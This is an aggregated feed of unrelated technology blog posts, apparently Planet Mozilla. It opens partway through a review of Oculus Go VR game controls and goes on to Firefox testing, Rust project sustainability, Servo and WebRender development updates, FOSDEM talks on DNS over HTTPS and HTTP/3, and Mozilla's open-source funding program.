A creature creation game. While there are several rooms, all interaction happens from fixed positions where you look around you. You travel to the various rooms by pointing and clicking on the door that you want to go to.

Dead and Buried

Shoot ghosts in an old west town. You don’t move at all in this game. You always shoot from fixed camera locations, similar to a carnival game.

Witchblood

This is actually a side scroller with a set that looks like little dollhouses that you view from the side. I’d say it was cute except that there are monsters everywhere. In any case, you don’t move the camera at all except to look from one end of a level to the other.

Affected : The Manor

A game where you walk around a haunted house. The control scheme is interesting. You use the trigger on the controller to move forward; however, the direction is controlled by your head view. The direction of the controller is used for your flashlight. I think it would be better if it were reversed: use the controller direction for movement and your head for the flashlight. Perhaps there’s a point later in the game where their decision matters. I did notice that the speed is constant; you are either moving or not. I didn’t experience any discomfort.

Tomb Raider: Laura’s Escape

This is a little puzzle adventure game that takes you to the movie’s trailer. For being essentially advertising it was surprisingly good. You navigate by pointing at and clicking on glowing lights that are trigger points. These then move you toward that spot. The movement is at a constant speed, but there is a slight slowdown when you reach the trigger point instead of an immediate stop. I felt a slight tinge of sickness but not much. In other parts of the game you climb by pointing and clicking on handholds on a wall. I like how they used the same mechanic in different ways.

Dreadhalls

A literal dungeon crawler where you walk through dark halls looking for clues to find the way out. This game uses the trigger to collect things and the forward button on the touchpad to move forward. It uses the direction of the controller for movement rather than head direction. This means you can move sideways. It also means you can smoothly move around twisty halls if you are sitting in a swivel chair. I like it more than the way Affected does it.

World of Wonders

This game lets you visit various ancient wonders and wander around as citizens. You navigate by teleporting to wherever you point. You can swipe left or right on the touchpad to rotate your view, though I found it a bit twitchy. Judging from the in-game tutorial, World of Wonders was designed originally for the Gear VR, so perhaps it’s not calibrated for the Oculus Go.

Short-distance teleporting is fine when you are walking around a scene, but to get between scenes you click on the sky to bring up a map, which then lets you jump to the other scenes. Within a scene you can also click on various items to learn more about them.

One interesting interaction is that sometimes characters in the scenes will talk to you and ask you questions. You can respond yes or no by nodding or shaking your head. I don’t think I’ve ever seen that in a game before. Interestingly, nods and shakes are not universal; different cultures use these gestures differently.

Rise of the Fallen

A fighting game where you slash at enemies. It doesn’t appear that you move at all, just that enemies attack you and you attack back with melee weapons.

Vendetta Online VR

Spaceship piloting game. This seems to be primarily a multi-player game, but I did the single-player training levels to learn how to navigate. All action takes place in the cockpit of a spaceship. You navigate by targeting where you want to go and tilting your head. Once you have picked a target you press turbo to go there quickly. Oddly, the star field is fixed while the cockpit floats around you. I think this means that if I wanted to go backwards I’d have to completely rotate myself around. Better have a swivel chair!

Smash Hit

A game where you smash glass things. The camera is on rails, moving quickly straight forward. I was slightly dizzy at first because of the speed but quickly got used to it. You press the trigger to fire in the direction your head is pointing; it doesn’t use the controller orientation. I’m guessing this is a game originally designed for Cardboard? The smashing of objects is satisfying and there are interesting challenges as further levels have more and more stuff to smash. There is no actual navigation because you are on rails.

Apollo 11 VR

A simulation of the moon landing with additional information about the Apollo missions. Mostly this consists of watching video clips or cinematics, in which the camera is moved around a scene, such as going up the elevator of the Saturn V rocket. In a few places you can control something, such as docking the spaceship with the LEM. The cinematics are good, especially for a device as graphically limited as the Go, but I did get a twinge of dizziness whenever the camera accelerated or decelerated. Largely, though, you are in a fixed position with zero interaction.

QMO - Firefox 65 Beta 10 Testday, January 11th

Hello Mozillians,

We are happy to let you know that on Friday, January 11th, we are organizing Firefox 65 Beta 10 Testday. We’ll be focusing our testing on Firefox Monitor, Content Blocking, and the Find Toolbar.

Check out the detailed instructions via this etherpad.

No previous testing experience is required, so feel free to join us on the #qa IRC channel, where our moderators will offer you guidance and answer your questions.

Join us and help us make Firefox better!

See you on Friday!

Gregory Szorc - Seeking Employment

After almost seven and a half years as an employee of Mozilla Corporation, I'm moving on. I have already worked my final day as an employee.

This post is the first time that I've publicly acknowledged my departure. To any Mozillians reading this, I regret that I did not send out a farewell email before I left. But the circumstances of my departure weren't conducive to doing so. I've been drafting a proper farewell blog post. But it has been very challenging to compose. Furthermore, each passing day brings with it new insights into my time at Mozilla and a new wrinkle to integrate into the reflective story I want to tell in that post. I vow to eventually publish a proper goodbye that serves as the bookend to my employment at Mozilla. Until then, just let me say that I'm already missing working with many of you. I've connected with several people since I left and still owe responses or messages to many more. If you want to get in touch, my contact info is in my résumé.

I left Mozilla without new employment lined up. That leads me to the subject line of this post: I'm seeking employment. The remainder of this post is thus tailored to potential employers.

My résumé has been updated. But that two page summary only scratches the surface of my experience and set of skills. The Body of Work page of my website is a more detailed record of the work I've done. But even it is not complete!

Perusing through my posts on this blog will reveal even more about the work I've done and how I go about it. My résumé links to a few posts that I think are great examples of the level of understanding and detail that I'm capable of harnessing.

As far as the kind of work I want to do or the type of company I want to work for, I'm trying to keep an open mind. But I do have some biases.

I prefer established companies to early start-ups for various reasons. Dan Luu's Big companies v. startups is aligned pretty well with my thinking.

One of the reasons I worked for Mozilla was because of my personal alignment with the Mozilla Manifesto. So I gravitate towards employers that share those principles and am somewhat turned off by those that counteract them. But I recognize that the world is complex and that competing perspectives aren't intrinsically evil. In other words, I try to maintain an open mind.

I'm attracted to employers that align their business with improving the well-being of the planet, especially the people on it. The link between the business and well-being can be tenuous: a B2B business for example is presumably selling something that helps people, and that helping is what matters to me. The tighter the link between the business and improving the world, the more attractive the employer is to me.

I started my university education as a biomedical engineer because I liked the idea of being at the intersection of technology and medicine. And part of me really wants to return to this space because there are few things more noble than helping a fellow human being in need.

As for the kind of role or technical work I want to do, I could go in any number of directions. I still enjoy doing individual contributor type work and believe I could be an asset to an employer doing that work. But I also crave working on a team, performing technical mentorship, and being a leader of technical components. I enjoy participating in high-level planning as well as implementing the low-level aspects. I recognize that while my individual output can be substantial (I can provide data showing that I was one of the most prolific technical contributors at Mozilla during my time there) I can be more valuable to an employer when I bestow skills and knowledge unto others through teaching, mentorship, setting an example, etc.

I have what I would consider expertise in a few domains that may be attractive to employers.

I was a technical maintainer of Firefox's build system and initiated a transition away from an architecture that had been in place since the Netscape days. I definitely geek out way too much on build systems.

I am a contributor to the Mercurial version control tool. I know way too much about the internals of Mercurial, Git, and other version control tools. I am intimately aware of scaling problems with these tools. Some of the scaling work I did for Mercurial saved Mozilla tens of thousands of dollars in direct operational costs and probably hundreds of thousands of dollars in saved people time due to fewer service disruptions and faster operations.

I have exposure to both client and server side work and the problems encountered within each domain. I've dabbled in lots of technologies, operating systems, and tools. I'm not afraid to learn something new. Although as my experience increases, so does my skepticism of shiny new things (I've been burned by technical fads too many times).

I have a keen fascination with optimization and scaling, whether it be on a technical level or in terms of workflows and human behavior. I like to ask "and then what?" so I'm thinking a few steps out and am prepared for the next problem or consequence of an immediate action.

I seem to have a knack for caring about user experience and interfaces. (Although my own visual design skills aren't the greatest - see my website design for proof.) I'm pretty passionate that tools that people use should be simple and usable. Cognitive dissonance, latency, and distractions are real and as an industry we don't do a great job minimizing these disruptions so focus and productivity can be maximized. I'm not saying I would be a good product manager or UI designer. But it's something I've thought about because not many engineers seem to exhibit the passion for good user experience that I do and that intersection of skills could be valuable.

My favorite time at Mozilla was when I was working on a unified engineering productivity team. The team controlled most of the tools and infrastructure that Firefox developers interacted with in order to do their jobs. I absolutely loved taking a whole-world view of that problem space and identifying the high-level problems - and low-hanging fruit - to improve the overall Firefox development experience. I derived a lot of satisfaction from identifying pain points, equating them to a dollar cost by extrapolating people time wasted due to them, justifying working on them, and finally celebrating - along with the overall engineering team - when improvements were made. I think I would be a tremendous asset to a company working in this space. And if my experience at Mozilla is any indicator, I would more than offset my total employment cost by doing this kind of work.

I've been entertaining the idea of contracting for a while before I resume full-time employment with a single employer. However, I've never contracted before and need to do some homework before I commit to that. (Please leave a comment or email me if you have recommendations on reading material.)

My dream contract gig would likely be to finish the Mercurial wire protocol and storage work I started last year. I would need to type up a formal proposal, but the gist of it is the work I started has the potential to leapfrog Git in terms of both client-side and server-side performance and scalability. Mercurial would be able to open Git repositories on the local filesystem as well as consume them via the Git wire protocol. Transparent Git interoperability would enable Mercurial to be used as a drop-in replacement for Git, which would benefit users who don't have control over the server (such as projects that live on GitHub). Mercurial's new wire protocol is designed with global scalability and distribution in mind. The goal is to enable server operators to deploy scalable VCS servers in a turn-key manner by relying on scalable key-value stores and content distribution networks as much as possible (Mercurial and Git today require servers to perform way too much work and aren't designed with modern distributed systems best practices, which is why scaling them is hard). The new protocol is being designed such that a Mercurial server could expose Git data. It would then be possible to teach a Git client to speak the Mercurial wire protocol, which would result in Mercurial being a more scalable Git server than Git is today. If my vision is achieved, this would make server-side VCS scaling problems go away and would eliminate the religious debate between Git and Mercurial (the answer would be deploy a Mercurial server, allow data to be exposed to Git, and let consumers choose). I conservatively estimate that the benefits to industry would be in the millions of dollars. How I would structure a contract to deliver aspects of this, I'm not sure. But if you are willing to invest six figures towards this bet, let's talk. A good foundation of this work is already implemented in Mercurial and the Mercurial core development team is already on-board with many aspects of the vision, so I'm not spewing vapor.

Another potential contract opportunity would be funding PyOxidizer. I started the project a few months back as a side-project as an excuse to learn Rust while solving a fun problem that I thought needed solving. I was hoping for the project to be useful for Mercurial and Mozilla one day. But if social media activity is any indication, there seems to be somewhat widespread interest in this project. I have no doubt that once complete, companies will be using PyOxidizer to ship products that generate revenue and that PyOxidizer will save them engineering resources. I'd very much like to recapture some of that value into my pockets, if possible. Again, I'm somewhat naive about how to write contracts since I've never contracted, but I imagine "deliver a tool that allows me to ship product X as a standalone binary to platforms Y and Z" is definitely something that could be structured as a contract.

As for the timeline, I was at Mozilla for what feels like an eternity in Silicon Valley. And Mozilla's way of working is substantially different from many companies. I need some time to decompress and unlearn some Mozilla habits. My future employer will inherit a happier and more productive employee by allowing me to take some much-needed time off.

I'm looking to resume full-time work no sooner than March 1. I'd like to figure out what the next step in my career is by the end of January. Then I can sign some papers, pack up my skis, and become a ski bum for the month of February: if I don't use this unemployment opportunity to have at least 20 days on the slopes this season and visit some new mountains, I will be very disappointed in myself!

If you want to get in touch, my contact info is in my résumé. I tend not to answer incoming calls from unknown numbers, so email is preferred. But if you leave a voicemail, I'll try to get back to you.

I look forward to working for a great engineering organization in the near future!

Will Kahn-GreeneEverett v1.0.0 released!

What is it?

Everett is a configuration library for Python apps.

Goals of Everett:

  1. flexible configuration from multiple configured environments
  2. easy testing with configuration
  3. easy documentation of configuration for users

From that, Everett has the following features:

  • is composable and flexible
  • makes it easier to provide helpful error messages for users trying to configure your software
  • supports auto-documentation of configuration with a Sphinx autocomponent directive
  • has an API for testing configuration variations in your tests
  • can pull configuration from a variety of specified sources (environment, INI files, YAML files, dict, write-your-own)
  • supports parsing values (bool, int, lists of things, classes, write-your-own)
  • supports key namespaces
  • supports component architectures
  • works with whatever you're writing--command line tools, web sites, system daemons, etc

v1.0.0 released!

This release fixes many sharp edges, adds a YAML configuration environment, and fixes Everett so that it has no dependencies unless you want to use YAML or INI.

It also drops support for Python 2.7--Everett no longer supports Python 2.

Why you should take a look at Everett

At Mozilla, I'm using Everett for Antenna which is the edge collector for the crash ingestion pipeline for Mozilla products including Firefox and Fennec. It's been in production for a little under a year now and doing super. Using Everett makes it much easier to:

  1. deal with different configurations between local development and server environments
  2. test different configuration values
  3. document configuration options

It's also used in a few other places and I plan to use it for the rest of the components in the crash ingestion pipeline.

First-class docs. First-class configuration error help. First-class testing. This is why I created Everett.

If this sounds useful to you, take it for a spin. It's almost a drop-in replacement for python-decouple and os.environ.get('CONFIGVAR', 'default_value') style of configuration.
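For a sense of what that looks like in practice, here is a minimal sketch. The class and function names follow the Everett documentation as I recall it, so double-check them against the version you install:

    from everett.manager import (
        ConfigDictEnv,
        ConfigManager,
        ConfigOSEnv,
        parse_bool,
    )

    # Look up values in the process environment first, then fall back to a
    # dict of defaults (the dict environment is also handy in tests).
    config = ConfigManager(
        environments=[
            ConfigOSEnv(),
            ConfigDictEnv({"DEBUG": "false", "HOST": "localhost"}),
        ]
    )

    # Similar in spirit to os.environ.get("DEBUG", "false"), but parsed and
    # documented, so misconfiguration produces a helpful error message.
    debug = config("debug", parser=parse_bool,
                   doc="Set DEBUG=true to enable debug mode.")
    host = config("host", doc="Hostname to bind to.")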

Enjoy!

Thank you!

Thank you to Paul Jimenez, who helped fix issues and provided thoughtful insight on API ergonomics!

Where to go for more

For more specifics on this release, see here: https://everett.readthedocs.io/en/latest/history.html#january-7th-2019

Documentation and quickstart here: https://everett.readthedocs.io/en/latest/

Source code and issue tracker here: https://github.com/willkg/everett

Niko MatsakisRust in 2019: Focus on sustainability

To me, 2018 felt like a big turning point for Rust, and it wasn’t just the edition. Suddenly, it has become “normal” for me to meet people using Rust at their jobs. Rust conferences are growing and starting to have a large number of sponsors. Heck, I even met some professional Rust developers amongst the parents at a kid’s birthday party recently. Something has shifted, and I like it.

At the same time, I’ve also noticed a lot of exhaustion. I know I feel it – and a lot of people I talk to seem to feel the same way. It’s great that so much is going on in the Rust world, but we need to get better at scaling our processes up and processing it effectively.

When I think about a “theme” for 2019, the word that keeps coming to mind for me is sustainability. I think Rust has been moving at a breakneck pace since 1.0, and that’s been great: it’s what Rust needed. But as Rust gains more solid footing out there, it’s a good idea for us to start looking for how we can go back and tend to the structures we’ve built.

Sustainable processes

There has been a lot of great constructive criticism of our current processes: most recently, boat’s post on organizational debt, along with Florian’s series of posts, did a great job of crystallizing a lot of the challenges we face. I am pretty confident that we can adjust our processes here and make things a lot better, though obviously some of these problems have no easy solution.

Obviously, I don’t know exactly what we should do here. But I think I see some of the pieces of the puzzle. Here is a variety of bullet points that have been kicking around in my head.

Working groups. In general, I would like to see us adopting the idea of working groups as a core “organizational unit” for Rust, and in particular as the core place where work gets done. A working group is an ad-hoc set of people that includes both members of the relevant Rust team and interested volunteers. Among other benefits, they can be a great vehicle for mentoring, since they give people a particular area to focus on, versus trying to participate in the Rust project as a whole, which can be very overwhelming.

Explicit stages. Right now, Rust features go through a number of official and semi-official stages before they become “stable”. As I have argued before, I think we would benefit from making these stages a more explicit part of the process (much as e.g. the TC39 and WebAssembly groups already do).

Finishing what we start. Right now, we have no mechanism to expose the “capacity” of our teams – we tend to, for example, accept RFCs without any idea who will implement them, or even mentor an implementation. In fact, there isn’t really a defined set of people to try and ensure that it happens. The result is that a lot of things linger in limbo, either unimplemented, undocumented, or unstabilized. I think working groups can help to solve this, by having a core leadership team that is committed to seeing the feature through.

Expose capacity. Continuing the previous point, I think we should integrate a notion of capacity into the staging process: so that we avoid moving too far in the design until we have some idea who is going to be implementing (or mentoring an implementation). If that is hard to do, then it indicates we may not have the capacity to do this idea right now – if that seems unacceptable, then we need to find something else to stop doing.

Don’t fly solo. One of the things that we discussed in a recent compiler team steering meeting is that being the leader of a working group is super stressful – it’s a lot to manage! However, being a co-leader of a working group is very different. Having someone else (or multiple someones) that you can share work with, bounce ideas off of, and so forth makes all the difference. It’s also a great mentoring opportunity, as the leaders of working groups don’t necessarily have to be full members of the team (yet). Part of exposing capacity, then, is trying to ensure that we don’t just have one person doing any one thing – we have multiple. This is scary: we will get less done. But we will all be happier doing it.

Evaluate priorities regularly. In my ideal world, we would make it very easy to find out what each person on a team is working on, but we would also have regular points where we evaluate whether those are the right things. Are they advancing our roadmap goals? Did something else more promising arise in the meantime? Part of the goal here is to leave room for serendipity: maybe some random person came in from the blue with an interesting language idea that seems really cool. We want to ensure we aren’t too “locked in” to pursue that idea. Incidentally, this is another benefit to not “flying solo” – if there are multiple leaders, then we can shift some of them around without necessarily losing context.

Keeping everyone in sync. Finally, I think we need to think hard about how to help keep people in sync. The narrow focus of working groups is great, but it can be a liability. We need to develop regular points where we issue “public-facing” updates, to help keep people outside the working group abreast of the latest developments. I envision, for example, meetings where people give an update on what’s been happening, the key decision and/or controversies, and seek feedback on interesting points. We should probably tie these to the stages, so that ideas cannot progress forward unless they are also being communicated.

TL;DR. The points above aren’t really a coherent proposal yet, though there are pieces of proposals in them. Essentially I am calling for a bit more structure and process, so that it is clearer what we are doing now and it’s more obvious when we are making decisions about what we should do next. I am also calling for more redundancy. I think that both of these things will initially mean that we do fewer things, but we will do them more carefully, and with less stress. And ultimately I think they’ll pay off in the form of a larger Rust team, which means we’ll have more capacity.

Sustainable technology

So what about the technical side of things? I think the “sustainable” theme fits here, too. I’ve been working on rustc for 7 years now (wow), and in all of that time we’ve mostly been focused on “getting the next goal done”. This is not to say that nobody ever cleans things up; there have been some pretty epic refactoring PRs. But we’ve also accumulated a fair amount of technical debt. We’ve got plenty of examples where a new system was added to replace the old – but only 90%, meaning that now we have two systems in use. This makes it harder to learn how rustc works, and it makes us spend more time fixing bugs and ICEs.

I would like to see us put a lot of effort into making rustc more approachable and maintainable. This means writing documentation, both of the rustdoc and rustc-guide variety. It also means finishing up things we started but never quite finished, like replacing the remaining uses of NodeId with the newer HirId. In some cases, it might mean rewriting whole subsystems, such as with the trait system and chalk.

None of this means we can’t get new toys. Cleaning up the trait system implementation, for example, makes things like Generic Associated Types (GATs) and specialization much easier. Finishing the transition into the on-demand query system should enable better incremental compilation as well as more complete parallel compilation (and better IDE support). And so forth.

Finally, it seems clear that we need to continue our focus on reducing compilation time. I think we have a lot of good avenues to pursue here, and frankly a lot of them are blocked on needing to improve the compiler’s internal structure.

Sustainable finances

When one talks about sustainability, that naturally brings to mind the question of financial sustainability as well. Mozilla has been the primary corporate sponsor of Rust for some time, but we’re starting to see more and more sponsorship from other companies, which is great. This comes in many forms: both Google and Buoyant have been sponsoring people to work on the async-await and Futures proposals, for example (and perhaps others I am unaware of); other companies have used contracting to help get work done that they need; and of course many companies have been sponsoring Rust conferences for years.

Going into 2019, I think we need to open up new avenues for supporting the Rust project financially. As a simple example, having more money to help with running CI could enable us to parallelize the bors queue more, which would help with reducing the time to land PRs, which in turn would help everything move faster (not to mention improving the experience of contributing to Rust).

I do think this is an area where we have to tread carefully. I’ve definitely heard horror stories of “foundations gone wrong”, for example, where decisions came to be dominated more by politics and money than technical criteria. There’s no reason to rush into things. We should take it a step at a time.

From a personal perspective, I would love to see more people paid to work part- or full-time on rustc. I’m not sure how best to make that happen, but I think it is definitely important. It has happened more than once that great rustc contributors wind up taking a job elsewhere that leaves them no time or energy to continue contributing. These losses can be pretty taxing on the project.

Reference material

I already mentioned that I think the compiler needs to put more emphasis on documentation as a means for better sustainability. I think the same also applies to the language: I’d like to see the lang team getting more involved with the Rust Reference and really trying to fill in the gaps. I’d also like to see the Unsafe Code Guidelines work continue. I think it’s quite likely that these should be roadmap items in their own right.

The Servo BlogThis Week In Servo 122

In the past three weeks, we merged 130 PRs in the Servo organization’s repositories.

Congratulations to Ygg01 for their new reviewer status for the html5ever repository!

Planning and Status

Our roadmap is available online. Plans for 2019 will be published soon.

This week’s status updates are here.

Exciting works in progress

  • mandreyel is adding support for parallel CSS parsing.
  • cbrewster is adding profiling support for WebGL APIs.
  • jdm is synchronizing WebGL rendering with WebRender’s GL requirements.

Notable Additions

  • gterzian replaced some synchronous communication with the embedder.
  • eijebong implemented support for the once argument for addEventListener.
  • Darkspirit slimmed down the list of supported TLS ciphers.
  • jdm fixed a web incompatibility preventing the DuckDuckGo search from loading.
  • oOIgnitionOo made it easier to run historical nightlies from the command line.
  • jdm fixed a bug preventing iframes from being sized correctly initially.
  • cdeler enabled the WebBluetooth tests from upstream.
  • paulrouget split the simpleservo embedding crate into crates for Rust, Java, and C.
  • georgeroman added support for the playbackRate media API.
  • denixmerigoux avoided an assertion failure in the text editing implementation.
  • SimonSapin converted the first macOS CI builder to run in Taskcluster.
  • emilio consolidated the style thread pools into a single per-process threadpool.
  • asajeffrey implemented keyboard support for Magic Leap devices.
  • ferjm implemented backoff support for media playback.
  • Manishearth implemented support for WebXR controller input.
  • cybai ensured that constructing URLs removes question mark characters appropriately.
  • Manishearth made safe Rc<Promise> values not be reported as unrooted by the rooting static analysis.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

Karl Dubost01 - They fixed it

This is a new chapter. I'll try to move it forward on a semi-regular basis. The work done by the awesome core engineers of Mozilla is essential. Some of the things they fix or explain have a direct impact on the web compatibility work. A couple of years ago at a Mozilla All Hands, I gave a lightning talk called "They fixed it", in which I quickly put forward to the audience all the (webcompat) cool bugs which had been fixed by Core engineers.

  • The site Channel NewsAsia is using a transform with a rotation for their headers when scrolling the content. The headers had a wider gap in Firefox than Chrome. An issue was reported. Brian Birtles dug into the issue. He explained in detail why the interpolation looks worse in Firefox than Chrome. Firefox has implemented the new specification. Web developers rely on an old version of the algorithm in Chrome. Chrome will change soon(?) and it will be equally broken. That was quite cool, Brian. Thanks!
  • I will probably write often about the Virtual Viewport and associated issues. Basically, to make it short, Chrome/Safari have the notion of a virtual viewport in addition to the device viewport. This creates a series of different behaviors for websites on Chrome vs Firefox on Android. We had a lot of webcompat issues about it. So as I said, I will talk more about it in the future. In the meantime, a big big shout out to Hiroyuki Ikezoe and Botond Ballo
  • Orthogonal to the Virtual Viewport I just mentioned, there's work to expose the Visual Viewport API. Jan Henning, just before Christmas 2018, fixed "Implement event handlers of the Visual Viewport API". This is part of the Visual Viewport interface. Thanks.

Mark SurmanRaising my sights in 2019

As I sit here quietly in the dawn of 2019, I feel deep gratitude for the year that has just passed — and tremendous hope for the year ahead. My hope is for a year where I raise my sights, to notice things more and see what can blossom from seeds I have sown over the past few years.

At the beginning of last year, I set the intention to ‘stay the course’ on big changes that I had made in both my personal life and at Mozilla. This has paid off. I have a house of my own that I have slowly, and with the help of others, turned into a home. I have a renewed sense of family and community, including a much richer relationship with my boys. And, I have energy, hope and gratitude for Mozilla and the people I work with that is stronger than it has been in years. Being present and staying the course on a good set of choices, made these things possible.

Looking ahead, it would be easy to say ‘I should just stay the course on staying the course’. In some ways, that is what I will do. Yet, I also want to look at things from a slightly different angle as I proceed.

My intention for 2019 is to ‘raise my sights’ — to look out further as I walk. In doing so, I hope to observe things I otherwise couldn’t see. And, to respond to these observations in a way that will slowly, subtly elevate and unlock more joy and love and impact. My intention is to go slow, look ahead and act boldly as I continue along the path I have carved over the past few years.

Oddly, I landed on this intention in part by reading about wine. In particular, I came across a term that I had never heard before: élevage, the care and work put in after fermentation to bring out quality and make a wine ready to drink. This may sound like a corny or even pretentious source for a yearly intention — but I found a great deal in the idea of élevage as I reflected on it.

Growing and crushing grapes is what most often comes to mind when we think of ‘making great wine’. Of course, this process of creative destruction is at the core of wine making. A great deal of energy is applied, intensely and with intention. That intensity and intention have a huge impact on what the wine becomes. In that way, it is much like starting a new project or making big changes in your life.

There is another part of winemaking that is almost as impactful, yet often under appreciated. This is the process of élevage: looking after that wine after you have ‘made’ it and before you lock it into a bottle for ageing and drinking. It is in the process of listening to the wine as it begins to take shape, raising it up and helping it mature in slow and subtle ways. Deciding on wood or steel or clay. Topping up the barrel. Or, not. Blending. This phase is critical in shaping what the wine does or doesn’t become — and yet it can only happen in its own time, in a very slow dance of listening and acting and listening again. This is a dance that we often forget when making changes to our lives and our organizations.

It was with this reflection that I landed on the idea of ‘raising my sights’ — and elevating what is possible — as my intention for 2019. I have put a great deal of energy and intention into the last few years, and I am seeing the results in my home life, my personal life and my work life. It has been a period of creative destruction. In so many ways, I am happy with what has been created. Yet, there is still much more to strive for and explore and enjoy on this path.

Now feels like the time to at once look up and slow down. Whether in small or big ways, I am hopeful that there are great things on the path ahead. The trick will be to notice and embrace and nurture them as they appear.

The post Raising my sights in 2019 appeared first on Mark Surman.

Nathan Froydarm64 windows update #1

A month ago, we formally announced that we were working to bring Firefox to ARM64 Windows.  The last month has seen significant progress on our journey to that release.

The biggest news is that we have dogfoodable (auto-updating) Nightly builds available!  As that message states, these Nightlies are even nightlier than our normal Nightlies, as they have not gone through our normal testing processes. But Firefox is perfectly usable on ARM64 Windows in its present state, so if you have an ARM64 device, please give it a try and file any bugs you find!

Since that announcement, native stack unwinding has been implemented.  That in turn means the Gecko Profiler can now capture native (C++/Rust) stack frames, which is an important step towards making the Gecko Profiler functional.  We also enabled WebRTC support, even though WebRTC video not working on ARM64 Windows is a known issue.

We’re currently working on porting our top-tier JavaScript JIT (IonMonkey) to ARM64.  We’re also working on enabling the crashreporter, which is a pretty important feature for getting bug reports from the field!  From my low-level tools perspective, the most interesting bug discovered via dogfooding is a WebRender crash caused by obscure ARM64-specific parameter passing issues in Rust itself.

Ideally, I’ll be writing updates every two weeks or so.  If you see something I missed, or want to point out something that should be in the next update, please email me or come find me on IRC.

Daniel StenbergMy talks at FOSDEM 2019

I’ll be celebrating my 10th FOSDEM when I travel down to Brussels again in early February 2019. That’s ten years in a row. It’ll also be the 6th year I present something there, as I’ve done these seven talks in the past:

My past FOSDEM appearances

2010. I talked Rockbox in the embedded room.

2011. libcurl, seven SSL libs and one SSH lib in the security room.

2015. Internet all the things – using curl in your device. In the embedded room.

2015. HTTP/2 right now. In the Mozilla room.

2016. an HTTP/2 update. In the Mozilla room.

2017. curl. On the main track.

2017. So that was HTTP/2, what’s next? In the Mozilla room.

DNS over HTTPS – the good, the bad and the ugly

On the main track, in Janson at 15:00 on Saturday 2nd of February.

DNS over HTTPS (aka “DoH”, RFC 8484) introduces a new transport protocol to do secure and private DNS messaging. Why it was made, how it works, and how it frees users (to resolve names).

The presentation will discuss reasons why DoH was deemed necessary and interesting to ship and deploy and how it compares to alternative technologies that offer similar properties. It will discuss how this protocol “liberates” users and offers stronger privacy (than the typical status quo).

It will show how to enable and start using DoH today.

It will also discuss some downsides with DoH and what you should consider before you decide to use a random DoH server on the Internet.

HTTP/3

In the Mozilla room, at 11:30 on Saturday 2nd of February.

HTTP/3 is the next coming HTTP version.

This time TCP is replaced by the new transport protocol QUIC and things are different yet again! This is a presentation about HTTP/3 and QUIC with a following Q&A about everything HTTP. Join us at Goto 10.

HTTP/3 is the designated name for the coming next version of the protocol that is currently under development within the QUIC working group in the IETF.

HTTP/3 is designed to improve in areas where HTTP/2 still has some shortcomings, primarily by changing the transport layer. HTTP/3 is the first major protocol to step away from TCP and instead it uses QUIC. I’ll talk about HTTP/3 and QUIC. Why the new protocols are deemed necessary, how they work, how they change how things are sent over the network and what some of the coming deployment challenges will be.

DNS Privacy panel

In the DNS room, at 11:55 on Sunday 3rd of February.

This isn’t strictly a prepared talk or presentation but I’ll still be there and participate in the panel discussion on DNS privacy. I hope to get most of my finer points expressed in the DoH talk mentioned above, but I’m fully prepared to elaborate on some of them in this session.

The Mozilla BlogMOSS 2018 Year in Review

Mozilla was born out of, and remains a part of, the open-source and free software movement. Through the Mozilla Open Source Support (MOSS) program, we recognize, celebrate, and support open source projects that contribute to our work and to the health of the internet.

2018 was a year of change and growth for the MOSS program. We worked to streamline the application process, undertook efforts to increase the diversity and inclusion of the program, and processed a record number of MOSS applications. The results? In total, MOSS provided over $970,000 in funding to over 40 open-source projects over the course of 2018. For the first time since the beginning of the program, we also received the majority of our applications from outside of the United States.

2018 highlights

While all MOSS projects advance the values of the Mozilla Manifesto, we’ve selected a few that stood out to us this year:

    • Secure Drop — $250,000 USD
      • SecureDrop is an open-source whistleblower submission system that media organizations can install to securely accept documents from anonymous sources. It was originally built by the late Aaron Swartz and is used by newsrooms all over the world, including those at The Guardian and the Associated Press. In 2018, MOSS gave its second award to Secure Drop; to date, the MOSS program has supported Secure Drop with $500,000 USD in funding.
    • The Tor Project — $150,000 USD
      • Tor is free software and an open network that helps defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security. In 2018, MOSS gave its second award to help modularize key aspects of the Tor codebase; to date, the MOSS program has supported this work with $300,000 USD in funding.
    • The Processing Foundation — $69,700 USD
      • The Processing Foundation maintains p5.js, an open-source JavaScript framework that makes creating visual media with code on the web accessible to anyone, especially those without traditional computer science backgrounds. p5.js enables users to quickly prototype interactive applications, data visualizations, and narrative experiences, and share them easily on the web.
    • Dat Project — $34,000 USD
      • Dat is a nonprofit-backed data sharing protocol for applications of the future. With software built for researchers and data management, Dat empowers people with decentralized data tools. MOSS provided $34,000 USD in funding to Dat for community-building, documentation, and tooling.

Seed Awards

With an eye toward broadening participation in the MOSS program and reaching new audiences, the MOSS team decided to try something new at this year’s Mozilla Festival in London: we invited Festival attendees who work on open-source projects to join us for an event we called “MOSS Speed Dating.” For the event, we established a special MOSS committee, comprised of existing committee members, Mozilla staff, and leaders in the open-source world. Attendees were invited to “pitch” their project to three different committee members for 10 minutes each. Following the event, the committee met to discuss which projects best exemplified the qualities we look for in all MOSS projects (openness, impact, alignment with the Mozilla mission) and provided each of the most promising projects with a $5,000 seed grant to help support future development. While many of these projects are less mature than the projects we’d support with a larger, traditional MOSS award, we hope that these seed awards will assist them in growing their codebases and communities.

The 14 projects that the committee selected were:

Looking forward to 2019

In 2019, we hope to double down on our efforts to widen the applicant pool for MOSS and support a record number of projects from a diverse set of maintainers around the globe. Do you know of an open-source project in need of support whose work advances Mozilla’s mission? Please encourage them to apply for a MOSS award!

The post MOSS 2018 Year in Review appeared first on The Mozilla Blog.

Will Kahn-GreeneSocorro in 2018

Summary

Socorro is the crash ingestion pipeline for Mozilla's products like Firefox. When Firefox crashes, the crash reporter collects data about the crash, generates a crash report, and submits that report to Socorro. Socorro saves the crash report, processes it, and provides an interface for aggregating, searching, and looking at crash reports.

2018 was a big year for Socorro. In this blog post, I opine about our accomplishments.

Read more… (15 mins to read)

Mozilla GFXWebRender newsletter #34

Happy new year! I’ll introduce WebRender’s 34th newsletter with a rather technical overview of a neat trick we call primitive segmentation. In previous posts I wrote about how we deal with batching and how we use the depth buffer both as a culling mechanism and as a way to save memory bandwidth. As a result, pixels rendered in the opaque pass are much cheaper than pixels rendered in the blend pass. This works great with rectangular opaque primitives that are axis-aligned so they don’t need anti-aliasing. Anti-aliasing, however, requires us to do some blending to smoothen the edges and rounded corners have some transparent pixels. We could tessellate a mesh that covers exactly the rounded primitive but we’d still need blending for the anti-aliasing of the border. What a shame, rounded corners are so common on the web, and they are often quite big.

